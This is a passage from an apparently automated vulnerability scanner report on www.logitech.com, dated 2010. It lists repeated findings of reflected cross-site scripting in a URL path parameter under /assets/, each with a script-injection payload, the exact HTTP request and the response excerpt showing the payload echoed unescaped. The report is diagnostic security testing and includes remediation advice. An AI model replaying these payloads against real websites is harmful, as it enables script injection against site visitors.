Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31163/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1be12</script><script>alert(1)</script>2744b2569f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1be12</script><script>alert(1)</script>2744b2569f5/31163/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','1be12</script><script>alert(1)</script>2744b2569f5/31163' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.70. http://www.logitech.com/assets/31163/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31163/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be596"><script>alert(1)</script>4b49c2ddca6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /be596"><script>alert(1)</script>4b49c2ddca6/31163/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="be596"><script>alert(1)</script>4b49c2ddca6/31163">
...[SNIP]...

1.71. http://www.logitech.com/assets/31246/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31246/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78bed</script><script>alert(1)</script>bff5dcc6c3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /78bed</script><script>alert(1)</script>bff5dcc6c3f/31246/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','78bed</script><script>alert(1)</script>bff5dcc6c3f/31246' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.72. http://www.logitech.com/assets/31246/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31246/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e89"><script>alert(1)</script>65b1efb4be6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /d0e89"><script>alert(1)</script>65b1efb4be6/31246/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="d0e89"><script>alert(1)</script>65b1efb4be6/31246">
...[SNIP]...

1.73. http://www.logitech.com/assets/31254/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31254/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2412</script><script>alert(1)</script>b9b9be1673f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c2412</script><script>alert(1)</script>b9b9be1673f/31254/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','c2412</script><script>alert(1)</script>b9b9be1673f/31254' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.74. http://www.logitech.com/assets/31254/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31254/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37054"><script>alert(1)</script>804e8fe3a5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /37054"><script>alert(1)</script>804e8fe3a5c/31254/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="37054"><script>alert(1)</script>804e8fe3a5c/31254">
...[SNIP]...

1.75. http://www.logitech.com/assets/31677/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31677/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45607"><script>alert(1)</script>73821424e66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /45607"><script>alert(1)</script>73821424e66/31677/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="45607"><script>alert(1)</script>73821424e66/31677">
...[SNIP]...

1.76. http://www.logitech.com/assets/31677/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31677/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e63ae</script><script>alert(1)</script>f1eeb453aae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e63ae</script><script>alert(1)</script>f1eeb453aae/31677/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','e63ae</script><script>alert(1)</script>f1eeb453aae/31677' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.77. http://www.logitech.com/assets/31923/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31923/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c6fe</script><script>alert(1)</script>eaf84f7ce9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6c6fe</script><script>alert(1)</script>eaf84f7ce9d/31923/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','6c6fe</script><script>alert(1)</script>eaf84f7ce9d/31923' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.78. http://www.logitech.com/assets/31923/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31923/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ba30"><script>alert(1)</script>1f3588020d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /6ba30"><script>alert(1)</script>1f3588020d7/31923/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="6ba30"><script>alert(1)</script>1f3588020d7/31923">
...[SNIP]...

1.79. http://www.logitech.com/assets/32564/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/32564/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb32a</script><script>alert(1)</script>7ade0831ab8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bb32a</script><script>alert(1)</script>7ade0831ab8/32564/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','bb32a</script><script>alert(1)</script>7ade0831ab8/32564' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.80. http://www.logitech.com/assets/32564/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/32564/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d42c"><script>alert(1)</script>58dfc3ea3b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /6d42c"><script>alert(1)</script>58dfc3ea3b1/32564/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="6d42c"><script>alert(1)</script>58dfc3ea3b1/32564">
...[SNIP]...

1.81. http://www.logitech.com/assets/33033/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33033/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c807b"><script>alert(1)</script>5ec5abf305e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /c807b"><script>alert(1)</script>5ec5abf305e/33033/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="c807b"><script>alert(1)</script>5ec5abf305e/33033">
...[SNIP]...

1.82. http://www.logitech.com/assets/33033/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33033/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48b13</script><script>alert(1)</script>df733b2b0ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /48b13</script><script>alert(1)</script>df733b2b0ec/33033/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','48b13</script><script>alert(1)</script>df733b2b0ec/33033' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.83. http://www.logitech.com/assets/33048/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33048/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c06c</script><script>alert(1)</script>0c7d00fb515 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /3c06c</script><script>alert(1)</script>0c7d00fb515/33048/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','3c06c</script><script>alert(1)</script>0c7d00fb515/33048' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.84. http://www.logitech.com/assets/33048/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33048/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb29"><script>alert(1)</script>1d38559caff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /7bb29"><script>alert(1)</script>1d38559caff/33048/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="7bb29"><script>alert(1)</script>1d38559caff/33048">
...[SNIP]...

1.85. http://www.logitech.com/assets/33048/2/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33048/2/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7137"><script>alert(1)</script>a11adaf5bed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /c7137"><script>alert(1)</script>a11adaf5bed/33048/2/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="c7137"><script>alert(1)</script>a11adaf5bed/33048/2">
...[SNIP]...

1.86. http://www.logitech.com/assets/33048/2/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33048/2/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2207</script><script>alert(1)</script>faa6bb4caa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c2207</script><script>alert(1)</script>faa6bb4caa8/33048/2/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
